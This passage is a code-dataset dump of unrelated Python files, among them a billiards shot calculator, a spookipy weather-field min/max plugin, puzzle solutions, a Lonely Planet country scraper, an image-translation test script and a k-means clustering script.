mpimg.imread(img_file)\n\n main()\n pass\n","repo_name":"mhhm2005eg/CarND-Advanced-Lane-Lines","sub_path":"gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3681502546","text":"from math import sin, cos, atan, pi\n\ndef ball_in_path(start_y, start_x, end_y, end_x, radius):\n a = end_y - start_y\n b = start_x - end_x\n c = (-start_x) * end_y + end_x * start_y\n for ball_y, ball_x in balls:\n if (round(ball_y, 4) == round(start_y, 4) and round(ball_x, 4) == round(start_x, 4)) or (round(ball_y, 4) == round(end_y, 4) and round(ball_x, 4) == round(end_x, 4)):\n continue\n\n if abs(a*ball_x + b*ball_y + c) / (a**2 + b**2) ** 0.5 < 2*radius and min(start_y, end_y) < ball_y < max(start_y, end_y) and min(start_x, end_x) < ball_x < max(start_x, end_x):\n return True\n return False\n\n\ndef cal_actan(dy, dx):\n if dx > 0:\n if dy > 0:\n return atan(dy/dx) * 180 / pi\n elif dy < 0:\n return atan(dy / dx) * 180 / pi + 360\n else:\n return 0\n\n elif dx < 0:\n if dy > 0:\n return atan(dy/dx) * 180 / pi + 180\n elif dy < 0:\n return atan(dy/dx) * 180 / pi + 180\n else:\n return 180\n\n elif dx == 0:\n if dy > 0:\n return 90\n elif dy < 0:\n return 270\n\n\nw = 127 # 당구대 가로 절반\nh = 127 # 당구대 세로\nholes = ((0, 0, 225), (0, w, 270), (0, 2*w, 315), (h, 0, 135), (h, w, 90), (h, 2*w, 45)) # 6개의 구멍 좌표와 진입각\n\nradius = 2.86 # 당구공 반지름\nwhite_y = 64 # 흰공 y좌표\nwhite_x = 64 # 흰공 x좌표\n\nballs = [(250, 5)] # 목표 공들의 좌표 (x, y)\n\nangles_white_to_ball = [] # 흰공에서 각 목표 공에 대한 각도(radian)\nfor ball_x, ball_y in balls:\n angles_white_to_ball.append(cal_actan(ball_y - white_y, ball_x - white_x))\nprint(\"흰공에서 각 목표 공의 각도:\", angles_white_to_ball)\nprint()\n\nangles_balls_to_holes = []\nsequence = []\nfor ball_num, ball_data in enumerate(balls):\n ball_x = ball_data[0]\n ball_y = ball_data[1]\n ball_to_holes = []\n for hole_num, hole_data in enumerate(holes):\n hole_y = hole_data[0]\n hole_x = hole_data[1]\n ball_to_hole = cal_actan(hole_y - ball_y, hole_x - ball_x)\n ball_to_holes.append(ball_to_hole)\n abs_angle = abs(angles_white_to_ball[ball_num] - ball_to_hole)\n sequence.append((min(abs_angle, 360 - abs_angle), ball_num, hole_num))\n angles_balls_to_holes.append(ball_to_holes)\n\nprint(angles_balls_to_holes)\nprint(sequence)\nsequence.sort() # 각도, 공 번호, 구멍 번호\nprint(\"우선순위:\", sequence)\n\nfor dummy, ball_num, hole_num in sequence:\n print(\"선택된 목표 공 번호:\", ball_num)\n print(\"선택된 구멍 번호:\", hole_num)\n ball_to_hole = angles_balls_to_holes[ball_num][hole_num]\n print(\"선택된 구멍까지의 각도:\", ball_to_hole)\n print(\"보정값:\", ball_to_hole - holes[hole_num][2])\n cal_angle = (ball_to_hole - holes[hole_num][2]) * 0.00 + ball_to_hole # 목표 공이 진행하게 될 각도, 임의로 정한 0.1 @@@@@@@@@@@@\n print(\"벽을 감안한 목표 공의 진행각:\", cal_angle)\n print()\n\n ball_x, ball_y = balls[ball_num]\n hole_y, hole_x, dummy = holes[hole_num]\n # 목표 공 진행 경로에 공이 있는지 검토\n if ball_in_path(ball_y, ball_x, hole_y, hole_x, radius):\n continue\n\n move_white_y = ball_y - 2 * radius * sin(cal_angle * pi / 180) # 흰공이 도착해야할 y좌표\n move_white_x = ball_x - 2 * radius * cos(cal_angle * pi / 180) # 흰공이 도착해야할 x좌표\n print(\"흰공이 도착해야할 좌표:\", move_white_y, \",\", move_white_x)\n\n shoot_angle = cal_actan(move_white_y - white_y, move_white_x - white_x) % (360) # 흰공 쏠 각도\n print(\"흰공 쏠 각도:\", shoot_angle)\n print()\n\n # 흰공 진행 경로에 공이 있는지 검토\n if ball_in_path(white_y, white_x, move_white_y, move_white_x, radius):\n continue\n\n distance_ball = ((hole_y - ball_y) ** 2 + (hole_x - ball_x) ** 2) ** 0.5\n print(\"목표 공이 가야할 거리:\", distance_ball)\n k = 9 # 상수 k = 2 * f / m, 임의로 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n need_target_v = k * distance_ball ** 0.5\n print(\"목표 공이 필요한 속도:\", need_target_v)\n abs_delta = abs(shoot_angle - cal_angle)\n print(\"흰공 진행방향과 목표 공이 진행할 방향의 각도:\", abs_delta)\n need_white_v = need_target_v / cos(abs_delta * pi / 180)\n print(\"목표 공이 필요한 충돌 직전 속도:\", need_white_v)\n distance_white = ((white_y - move_white_y) ** 2 + (white_x - move_white_x) ** 2) ** 0.5\n print(\"흰공이 이동하는 거리\", distance_white)\n need_white_v0 = (need_white_v ** 2 + k * distance_white) ** 0.5\n print(\"흰공의 초기 속도:\", need_white_v0)\n print()\n\n print(\"결정된 흰 공의 각도: %f, 파워: %f\"%(shoot_angle, need_white_v0))\n shoot_angle = ((360 - shoot_angle) + 90) % 360 # 최종 각도\n print(\"출력할 각도: %f, 힘: %f\"%(shoot_angle, need_white_v0))\n break\n\n\n# 아무런 방법도 없을 경우\nelse:\n print(\"최후의 보루\")","repo_name":"Sunghwan-DS/TIL","sub_path":"Python/SSAFY_pocketball_with_notes.py","file_name":"SSAFY_pocketball_with_notes.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6090674684","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport datetime\nimport logging\n\nimport dask.array as da\nimport fstpy\nimport numpy as np\nimport pandas as pd\n\nfrom ..plugin import Plugin, PluginParser\nfrom ..utils import (create_empty_result, final_results, get_list_of_forecast_hours, \n initializer, to_numpy, validate_list_of_nomvar, validate_list_of_times, \n validate_list_of_tuples_of_times, validate_nomvar)\nfrom ..configparsingutils import apply_lambda_to_list, convert_time_range, convert_time\n\nclass TimeIntervalMinMaxError(Exception):\n pass\n\nclass TimeIntervalMinMax(Plugin):\n \"\"\"Calculation of the minimum/maximum of a field whitin a specified time frame\n\n :param df: Input dataframe\n :type df: pd.DataFrame\n :param nomvar: Target nomvar(s) for the computation of min max\n :type nomvar: str or list of str\n :param min: get the minimum, defaults to False\n :type min: bool, optional\n :param max: get the maximum, defaults to False\n :type max: bool, optional\n :param forecast_hour_range: List of forecast hour ranges, tuple of 2 values\n :type forecast_hour_range: tuple(datetime.timedelta, datetime.timedelta) or list of tuple(datetime.timedelta, datetime.timedelta)\n :param interval: List of the time intervals between inputs within each time range.\n :type interval: datetime.timedelta or list of datetime.timedelta\n :param step: List of the time steps between successive start times within each time range\n :type step: datetime.timedelta or list of datetime.timedelta \n :param nomvar_min: nomvar of min result field, defaults to None\n :type nomvar_min: str or list of str, optional\n :param nomvar_max: nomvar of min result field, defaults to None\n :type nomvar_max: str or list of str, optional\n \"\"\"\n @initializer\n def __init__(self, df: pd.DataFrame, \n nomvar:str=None, min:bool=False, max:bool=False, \n forecast_hour_range=None, interval=None, step=None, \n nomvar_min=None, nomvar_max=None):\n \n self.validate_input()\n\n def validate_input(self):\n if self.df.empty:\n raise TimeIntervalMinMaxError('No data to process')\n\n self.df = fstpy.metadata_cleanup(self.df)\n\n self.df = fstpy.add_columns(self.df, ['forecast_hour'])\n\n if (self.nomvar is None) or (self.forecast_hour_range is None):\n raise TimeIntervalMinMaxError(\n 'One of the mandatory parameter (nomvar, forecast_hour_range) is None')\n\n self.nomvar = validate_list_of_nomvar(self.nomvar, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n l_nomvar = len(self.nomvar)\n\n if (self.min is None) and (self.max is None):\n self.min = True\n self.max = True\n\n if self.min & (self.nomvar_min is None):\n self.nomvar_min = [''.join(['V',str(i),'MN']) for i in range(1,l_nomvar+1)]\n\n if self.max & (self.nomvar_max is None):\n self.nomvar_max = [''.join(['V',str(i),'MX']) for i in range(1,l_nomvar+1)]\n\n if self.min:\n self.nomvar_min = validate_list_of_nomvar(self.nomvar_min, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n l_nbmin = len(self.nomvar_min)\n if l_nomvar != l_nbmin:\n raise TimeIntervalMinMaxError('There must be the same number of output nomvar as there are inputs')\n self.df['nomvar_min'] = None\n for nomvar,nomvar_min in zip(self.nomvar,self.nomvar_min):\n self.df.loc[self.df.nomvar==nomvar,'nomvar_min'] = nomvar_min\n if self.max: \n self.nomvar_max = validate_list_of_nomvar(self.nomvar_max, 'TimeIntervalMinMax', TimeIntervalMinMaxError)\n l_nbmax = len(self.nomvar_max)\n if l_nomvar != l_nbmax:\n raise TimeIntervalMinMaxError('There must be the same number of output nomvar as there are inputs')\n self.df['nomvar_max'] = None\n for nomvar,nomvar_max in zip(self.nomvar,self.nomvar_max):\n self.df.loc[self.df.nomvar==nomvar,'nomvar_max'] = nomvar_max \n\n\n self.forecast_hour_range = validate_list_of_tuples_of_times(self.forecast_hour_range, TimeIntervalMinMaxError)\n l_fcast = len(self.forecast_hour_range)\n\n if self.step is None:\n self.step = [datetime.timedelta(hours=1) for i in range(l_fcast)]\n else:\n self.step = validate_list_of_times(self.step, TimeIntervalMinMaxError)\n\n if self.interval is None:\n self.interval = [(i[1] - i[0]) for i in self.forecast_hour_range]\n else:\n self.interval = validate_list_of_times(self.interval, TimeIntervalMinMaxError) \n\n l_int = len(self.interval)\n l_step = len(self.step)\n \n if l_fcast != l_int or l_fcast != l_step:\n raise TimeIntervalMinMaxError('All list must be the same length')\n\n for i in range(len(self.interval)):\n if self.interval[i] > self.forecast_hour_range[i][1] - self.forecast_hour_range[i][0]:\n raise TimeIntervalMinMaxError(\n 'The interval must be lower or equal to upper bound minus lower bound of forecast_hour_range.')\n\n self.meta_df = self.df.loc[self.df.nomvar.isin(\n [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])].reset_index(drop=True)\n\n self.df_without_intervals = self.df.loc[(~self.df.nomvar.isin(\n [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])) & (self.df.interval.isna()) & (self.df.nomvar.isin(self.nomvar))].reset_index(drop=True)\n\n self.df_with_intervals = self.df.loc[(~self.df.nomvar.isin(\n [\"^^\", \">>\", \"^>\", \"!!\", \"!!SF\", \"HY\", \"P0\", \"PT\"])) & (~self.df.interval.isna()) & (self.df.nomvar.isin(self.nomvar))].reset_index(drop=True)\n\n self.groups_without_interval = self.df_without_intervals.groupby(['grid', 'nomvar','ip1_kind'])\n self.groups_with_interval = self.df_with_intervals.groupby(['grid', 'nomvar','ip1_kind'])\n\n\n def compute(self) -> pd.DataFrame:\n logging.info('TimeIntervalMinMax - compute\\n')\n\n self.forecast_hours = get_list_of_forecast_hours(self.forecast_hour_range, self.interval, self.step)\n\n if len(self.forecast_hours) == 0:\n raise TimeIntervalMinMaxError('Unable to calculate intervals with provided parameters')\n df_list = []\n for _, current_group in self.groups_with_interval:\n \n current_group['lower_bound'] = current_group['interval'].map(get_lower_bound)\n current_group['upper_bound'] = current_group['interval'].map(get_upper_bound)\n \n diffs = []\n incomplete = False\n for forecast_hours in self.forecast_hours:\n b_inf = forecast_hours[0]\n b_sup = forecast_hours[1]\n \n interval_df = current_group.loc[current_group.lower_bound.astype('int32').between(b_inf,b_sup, inclusive='both')]\n\n if interval_df.empty:\n interval_df = current_group.loc[current_group.upper_bound.astype('int32').between(b_inf,b_sup, inclusive='both')]\n if interval_df.empty:\n logging.warning(f'No data found for interval: {int(b_inf/3600)} @ {int(b_sup/3600)}')\n incomplete = True\n break\n \n res_df = self.process(current_group, interval_df, b_inf, b_sup)\n\n diffs.append(res_df)\n\n if not incomplete:\n for df in diffs:\n df.drop(columns=['lower_bound','upper_bound'])\n df_list.append(df)\n\n for _, current_group in self.groups_without_interval:\n\n diffs = []\n incomplete = False\n for forecast_hours in self.forecast_hours:\n b_inf = forecast_hours[0]\n b_sup = forecast_hours[1]\n \n interval_df = current_group.loc[current_group.forecast_hour.dt.total_seconds().astype('int32').between(b_inf,b_sup, inclusive='both')]\n\n if interval_df.empty:\n logging.warning(f'No data found for interval: {int(b_inf/3600)} @ {int(b_sup/3600)}')\n incomplete = True\n break\n \n res_df = self.process(current_group, interval_df, b_inf, b_sup)\n\n diffs.append(res_df)\n\n if not incomplete:\n for df in diffs:\n df_list.append(df)\n\n\n return final_results(df_list, TimeIntervalMinMaxError, self.meta_df)\n\n def process(self, current_group, interval_df, b_inf, b_sup):\n arr3d = da.stack(interval_df['d'])\n results = []\n if self.min:\n # set new ip2, ip3 and npas\n nomvar_min = current_group.iloc[0].nomvar_min\n min_df = create_result_container(current_group, b_inf, b_sup, nomvar_min)\n min_df.at[0, 'd'] = np.min(arr3d, axis=0)\n results.append(min_df)\n if self.max: \n # set new ip2, ip3 and npas\n nomvar_max = current_group.iloc[0].nomvar_max\n max_df = create_result_container(current_group, b_inf, b_sup, nomvar_max)\n max_df.at[0, 'd'] = np.max(arr3d, axis=0)\n results.append(max_df)\n\n res_df = pd.concat(results, ignore_index=True)\n\n return res_df\n\n @staticmethod\n def parse_config(args: str) -> dict:\n \"\"\"method to translate spooki plugin parameters to python plugin parameters\n :param args: input unparsed arguments\n :type args: str\n :return: a dictionnary of converted parameters\n :rtype: dict\n \"\"\"\n parser = PluginParser(prog=TimeIntervalMinMax.__name__, parents=[Plugin.base_parser],add_help=False)\n parser.add_argument('--fieldName',required=True,type=str,dest='nomvar', help=\"List of field names.\")\n parser.add_argument('--interval',type=str, help=\"List of each time range used for the minimum/maximum calculation\")\n parser.add_argument('--rangeForecastHour',required=True,type=str,dest='forecast_hour_range', help=\"List of time ranges in hours.\")\n parser.add_argument('--step',type=str, help=\"List of the time steps in hours between successive start times within each time range.\")\n parser.add_argument('--outputFieldNameMax',type=str,dest='nomvar_max',help=\"List of names of maximum field.\")\n parser.add_argument('--outputFieldNameMin',type=str,dest='nomvar_min',help=\"List of names if minimum fields.\")\n parser.add_argument('--type',type=str,required=True,choices=[\"MIN\",\"MAX\",\"BOTH\"], help=\"Calculation of minimum and/or maximum.\")\n\n parsed_arg = vars(parser.parse_args(args.split()))\n\n if parsed_arg['type'] == \"MIN\":\n parsed_arg['min'] = True\n elif parsed_arg['type'] == \"MAX\":\n parsed_arg['max'] = True\n else:\n parsed_arg['min'] = True\n parsed_arg['max'] = True\n\n if parsed_arg['interval'] is not None:\n parsed_arg['interval'] = apply_lambda_to_list(parsed_arg['interval'].split(','), lambda a: convert_time(a))\n if parsed_arg['step'] is not None:\n parsed_arg['step'] = apply_lambda_to_list(parsed_arg['step'].split(','), lambda a: convert_time(a))\n parsed_arg['forecast_hour_range'] = apply_lambda_to_list(parsed_arg['forecast_hour_range'].split(','), lambda a: convert_time_range(a))\n\n parsed_arg['nomvar'] = parsed_arg['nomvar'].split(',')\n apply_lambda_to_list(parsed_arg['nomvar'],lambda a : validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n\n if parsed_arg['nomvar_max'] is not None:\n parsed_arg['nomvar_max'] = parsed_arg['nomvar_max'].split(',')\n apply_lambda_to_list(parsed_arg['nomvar_max'],lambda a : True if a is None else validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n if parsed_arg['nomvar_min'] is not None:\n parsed_arg['nomvar_min'] = parsed_arg['nomvar_min'].split(',')\n apply_lambda_to_list(parsed_arg['nomvar_min'],lambda a : True if a is None else validate_nomvar(a,\"TimeIntervalMinMax\",TimeIntervalMinMaxError))\n\n return parsed_arg\n\ndef create_result_container(df, b_inf, b_sup, nomvar):\n deet = df.iloc[0]['deet']\n npas = int(b_sup / deet)\n # npas = int((ip2 * 3600) / deet)\n\n inter = fstpy.Interval('ip2', b_inf, b_sup, 10)\n res_df = create_empty_result(df, {'nomvar':nomvar, 'etiket':'TIMNMX',\n 'interval':inter, 'npas': npas})\n return res_df\n\ndef check_for_negative_values(arr, location):\n if np.any(np.where(arr < 0.,True,False)):\n logging.warning(f\"Found a negative value in the {location}! Probable cause is loss of precision when converting to float computational type\")\n logging.warning(f'The lowest found negative value was : {to_numpy(np.min(arr))}')\n\n\ndef get_lower_bound(interval):\n return interval.low*3600\n\ndef get_upper_bound(interval):\n return interval.high*3600\n","repo_name":"sebastiendfortier/spookipy","sub_path":"spookipy/timeintervalminmax/timeintervalminmax.py","file_name":"timeintervalminmax.py","file_ext":"py","file_size_in_byte":13133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36439666251","text":"# Day 2\n# To fix: pad array and check for pad, won't need to check range, same function for both parts\n\nfrom day0 import *\n\n\ndef part1(data):\n \"\"\" run part 1\"\"\"\n # Keypad\n # 1 2 3\n # 4 5 6\n # 7 8 9\n keypad = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\n buttons = 0\n\n row = 1\n col = 1\n\n for line in data:\n for char in line:\n nr = row\n nc = col\n if char == 'U':\n nr -= 1\n elif char == 'D':\n nr += 1\n elif char == 'L':\n nc -= 1\n else:\n nc += 1\n if nr in range(0, 3) and nc in range(0, 3):\n row = nr\n col = nc\n buttons = buttons*10 + (keypad[row, col])\n\n print(buttons)\n return buttons\n\n\ndef part2(data):\n \"\"\"run part 2\"\"\"\n\n # Keypad\n # 0 0 1 0 0\n # 0 2 3 4 0\n # 5 6 7 8 9\n # 0 A B C 0\n # 0 0 D 0 0\n keypad = np.array([[0, 0, 1, 0, 0], [0, 2, 3, 4, 0], [5, 6, 7, 8, 9], [0, 'A', 'B', 'C', 0], [0, 0, 'D', 0, 0]])\n buttons = []\n\n row = 2\n col = 0\n\n for line in data:\n for char in line:\n nr = row\n nc = col\n if char == 'U':\n nr -= 1\n elif char == 'D':\n nr += 1\n elif char == 'L':\n nc -= 1\n else:\n nc += 1\n if nr in range(0, len(keypad)) and nc in range(0, len(keypad)):\n if not keypad[nr, nc] == '0':\n row = nr\n col = nc\n print(\"Row: \" + str(row) + \" Col: \" + str(col))\n print(keypad[nr, nc])\n buttons.append(keypad[row, col])\n\n print(buttons)\n return ''.join(buttons)\n\n\nif __name__ == \"__main__\":\n data = Input(2).read().split()\n # part1(data)\n print(part2(data))","repo_name":"brianshin22/advent","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1026004552","text":"#User function Template for python3\n[]\nclass Solution:\n def arraySortedOrNot(self, arr, n):\n left = 0\n right = 1\n while right < n:\n if arr[left] > arr[right]:\n return 0\n else:\n left +=1\n right +=1\n return 1\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n tc = int(input())\n while tc > 0:\n n = int(input())\n arr = list(map(int, input().strip().split()))\n \n ob = Solution()\n ans = ob.arraySortedOrNot(arr, n)\n if ans:\n print(1)\n else:\n print(0)\n tc -= 1\n\n# } Driver Code Ends","repo_name":"abrahamshimekt/Competitive-Programming-Problem-Solutions","sub_path":"Check if array is sorted - GFG/check-if-array-is-sorted.py","file_name":"check-if-array-is-sorted.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"41178273414","text":"import scrapy\n\nclass CountrySpider(scrapy.Spider):\n\n name = 'country'\n\n def start_requests(self):\n urls = [\n 'https://www.lonelyplanet.com/places'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for country in response.css('div.grid-wrapper--10 a.card--list h3.card--list__name::text').extract():\n yield {\n 'name': country[1:-1]\n }","repo_name":"chesiver/CS6400_Travel_Recommend","sub_path":"scrapy_travel_recommend/scrapy_travel_recommend/spiders/country_spider.py","file_name":"country_spider.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28714139514","text":"import argparse\nimport os\nimport torch\n\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nfrom PIL import Image \nfrom models import E1, E2, Decoder\nfrom utils import load_model_for_eval, get_test_imgs\nimport torchvision.utils as vutils\nimport functools \n\n@functools.lru_cache(maxsize=2)\ndef get_transform(crop, resize):\n comp_transform = transforms.Compose([\n transforms.CenterCrop(crop),\n transforms.Resize(resize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n return comp_transform\n\ndef default_loader(filepath):\n return Image.open(filepath).convert('RGB')\n\ndef load_image(filepath, crop, resize):\n image = default_loader(filepath)\n comp_transform = get_transform(crop, resize)\n image = comp_transform(image)\n return image\n\ndef load_image_tensor(filepath, crop, resize):\n image = load_image(filepath, crop, resize)\n \n with torch.no_grad(): \n image = Variable(image)\n if torch.cuda.is_available():\n image = image.cuda()\n \n return image\n\ndef my_get_test_imgs(args):\n human = []\n with open(os.path.join(args.root, 'testA.txt')) as file:\n for datapath in file.readlines():\n datapath = datapath.strip()\n human_tensor = load_image_tensor(datapath, args.cropA, args.resize)\n human.append(human_tensor)\n\n cartoon = []\n with open(os.path.join(args.root, 'testB.txt')) as file:\n for datapath in file.readlines():\n datapath = datapath.strip()\n cartoon_tensor = load_image_tensor(datapath, args.cropB, args.resize)\n cartoon.append(cartoon_tensor)\n \n return human, cartoon\n\ndef trans(args, idx, test_domA, test_domB, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder):\n print(idx)\n \n exps = []\n\n # --------------- real images --------------- # \n with torch.no_grad():\n exps.append(test_domA.unsqueeze(0))\n \n # --------------- real2cartoon images --------------- #\n intput_cartoons = []\n separate_A = torch.full((1, args.sep * (args.resize // 64) * (args.resize // 64)), 0).cuda()\n common_A = rc_e1(test_domA.unsqueeze(0))\n A_encoding = torch.cat([common_A, separate_A], dim=1)\n A_decoding = rc_decoder(A_encoding)\n exps.append(A_decoding)\n intput_cartoons.append(A_decoding)\n \n # --------------- cartoon2cartoon images --------------- #\n output_cartoons = []\n separate_A = c_e2(test_domB.unsqueeze(0))\n common_B = c_e1(intput_cartoons[0])\n BA_encoding = torch.cat([common_B, separate_A], dim=1)\n BA_decoding = c_decoder(BA_encoding)\n exps.append(BA_decoding)\n output_cartoons.append(BA_decoding)\n \n # --------------- cartoon2real images --------------- #\n separate_A = rc_e2(test_domA.unsqueeze(0))\n common_B = rc_e1(output_cartoons[0])\n BA_encoding = torch.cat([common_B, separate_A], dim=1)\n BA_decoding = rc_decoder(BA_encoding)\n exps.append(BA_decoding)\n \n # ------------- reference cartoon images ------------- # \n with torch.no_grad():\n exps.append(test_domB.unsqueeze(0))\n \n with torch.no_grad():\n exps = torch.cat(exps, 0)\n \n vutils.save_image(exps,\n '%s/experiments_%s.png' % (args.out, idx),\n normalize=True, nrow=args.num_display) \n \ndef test(args):\n # ---------- load model_real_cartoon ---------- #\n \n rc_e1 = E1(args.sep, int((args.resize / 64)))\n rc_e2 = E2(args.sep, int((args.resize / 64)))\n rc_decoder = Decoder(int((args.resize / 64)))\n\n if torch.cuda.is_available():\n rc_e1 = rc_e1.cuda()\n rc_e2 = rc_e2.cuda()\n rc_decoder = rc_decoder.cuda()\n\n if args.load_rc != '':\n save_file = os.path.join(args.load_rc)\n load_model_for_eval(save_file, rc_e1, rc_e2, rc_decoder)\n\n rc_e1 = rc_e1.eval()\n rc_e2 = rc_e2.eval()\n rc_decoder = rc_decoder.eval()\n \n # ---------- load model_cartoon ---------- #\n \n c_e1 = E1(args.sep, int((args.resize / 64)))\n c_e2 = E2(args.sep, int((args.resize / 64)))\n c_decoder = Decoder(int((args.resize / 64)))\n\n if torch.cuda.is_available():\n c_e1 = c_e1.cuda()\n c_e2 = c_e2.cuda()\n c_decoder = c_decoder.cuda()\n\n if args.load_c != '':\n save_file = os.path.join(args.load_c)\n load_model_for_eval(save_file, c_e1, c_e2, c_decoder)\n\n c_e1 = c_e1.eval()\n c_e2 = c_e2.eval()\n c_decoder = c_decoder.eval()\n \n # -------------- running -------------- #\n \n if not os.path.exists(args.out) and args.out != \"\":\n os.mkdir(args.out)\n\n# trans(args, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder)\n test_domA_cluster, test_domB_cluster = my_get_test_imgs(args)\n for idx, (test_domA, test_domB) in enumerate(list(zip(test_domA_cluster, test_domB_cluster))):\n trans(args, idx, test_domA, test_domB, rc_e1, rc_e2, rc_decoder, c_e1, c_e2, c_decoder)\n\nif __name__=='__main__':\n \"\"\"\n python joint_lyk.py --load_rc /home/aailyk057pku/winter-camp-pek/model/checkpoint --load_c /home/aailyk057pku/winter-camp-pek/model/checkpoint_40000\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--root', default='data_joint')\n parser.add_argument('--load_rc', default='')\n parser.add_argument('--load_c', default='')\n parser.add_argument('--out', default='joint')\n parser.add_argument('--resize', type=int, default=128)\n parser.add_argument('--cropA', type=int, default=178)\n parser.add_argument('--cropB', type=int, default=378)\n parser.add_argument('--sep', type=int, default=25)\n parser.add_argument('--bs', type=int, default=64)\n parser.add_argument('--num_display', type=int, default=20)\n\n args = parser.parse_args()\n\n test(args)","repo_name":"dingmyu/winter_camp","sub_path":"code/joint_lyk.py","file_name":"joint_lyk.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28926945487","text":"#Problem 8 from Project Euler\n#Solution by Paul Barton\n#\n#Here is the text of the problem:\n#Find the greatest product of five consecutive digits in the 1000-digit number.\n# 7316717653133...420752963450\n#(I stored the full number in the text file named \"PE_8.txt\")\n#\n#My strategy is to simply parse the number into a list/string of single digits\n#and calculate the products, keeping the largest number as I go along\n\nimport time\n\ndef digitsProduct(input_string):\n '''Accepts a string of digits to convert to integers; returns their product'''\n val = 1\n for digit in input_string:\n val = val * int(digit)\n return val\n\nt = time.time()\n\nwith open('PE_8.txt', 'r') as mynum:\n n = mynum.read()\n\nwindow = 5 # Set the window size, 5 for the described problem\ngreatest = 0 # Store greatest value\n\nfor i in xrange(len(n) - window + 1): # Scan through the string\n val = digitsProduct(n[i: i + window]) # Product value\n if val > greatest:\n greatest = val\n\nprint('The greatest product of digits found was: {0}'.format(greatest))\nprint('This took {0} seconds'.format(time.time() - t))\n ","repo_name":"SavinaRoja/challenges","sub_path":"Project_Euler/1-10/PE_8.py","file_name":"PE_8.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"29039887760","text":"class Solution:\n def minAreaRect(self, points: List[List[int]]) -> int:\n points.sort()\n points_set = set([tuple(point) for point in points])\n smallest = float('inf')\n for i, (x1, y1) in enumerate(points):\n for j, (x2, y2) in enumerate(points[i:], i):\n if x1 < x2 and y1 < y2 and (x1, y2) in points_set and (x2, y1) in points_set:\n area = (x2 - x1) * (y2 - y1)\n smallest = min(smallest, area)\n return smallest if smallest != float('inf') else 0","repo_name":"Hangpanbee/LeetcodeDump","sub_path":"939-minimum-area-rectangle/939-minimum-area-rectangle.py","file_name":"939-minimum-area-rectangle.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"2805401892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 10 23:28:54 2020\n\n@author: JESUS\n\"\"\"\n\n\n\t\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin_min\n\n\ndatos=pd.read_csv('german.csv')\n\n_,idx = np.unique(datos['Trabajo'],return_inverse=True)\ndatos['Trabajo'] = idx\nprint(datos['Trabajo'])\n\n \nfrom mpl_toolkits.mplot3d import Axes3D\nplt.rcParams['figure.figsize'] = (16, 9)\nplt.style.use('ggplot')\n\ndataframe = pd.read_csv(r\"analisis.csv\")\nprint(dataframe.head())\nprint(dataframe.groupby('categoria').size())\n#sb.pairplot(dataframe.dropna(), hue='categoria',size=4,vars=[\"op\",\"ex\",\"ag\"],kind='scatter')\nX = np.array(dataframe[[\"op\",\"ex\",\"ag\"]])\ny = np.array(dataframe['categoria'])\nX.shape\n\n\"\"\"\nfig = plt.figure()\nax = Axes3D(fig)\ncolores=['blue','red','green','blue','cyan','yellow','orange','black','pink','brown','purple']\nasignar=[]\nfor row in y:\n asignar.append(colores[row])\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=asignar,s=60)\n\"\"\"\n\nkmeans = KMeans(n_clusters=5).fit(X)\ncentroids = kmeans.cluster_centers_\nprint(centroids)\n\n# Predicting the clusters\nlabels = kmeans.predict(X)\n# Getting the cluster centers\nC = kmeans.cluster_centers_\ncolores=['red','green','blue','cyan','yellow']\nasignar=[]\nfor row in labels:\n asignar.append(colores[row])\n \nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=asignar,s=60)\nax.scatter(C[:, 0], C[:, 1], C[:, 2], marker='*', c=colores, s=1000)","repo_name":"Divier97/la-monda","sub_path":"CODIGOS PYTHON/cluster_1.py","file_name":"cluster_1.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 